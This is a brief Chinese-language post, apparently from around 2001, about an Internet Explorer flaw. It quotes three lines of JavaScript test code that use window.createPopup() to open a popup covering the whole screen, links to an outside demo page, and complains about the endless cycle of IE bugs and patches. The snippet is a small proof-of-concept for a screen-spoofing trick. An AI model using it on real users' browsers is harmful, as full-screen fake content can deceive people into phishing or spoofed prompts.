原文:http://www.xfocus.net/vuls/200110/1469.html
测试代码
-------------------
op=window.createPopup();
op.document.body.innerHTML="...html...";
op.show(0,0,screen.width,screen.height,document.body);
-------------------
演示页:
http://www.guninski.com/opf2.html
很有意思的是,真的是IE想做的越方便,结果是搞得IE漏洞更多了,艾,这样得事情微软何时了啊,我们就只等着不断升级,然后又是不断的bug,等着不断升级......这样的无限循环中。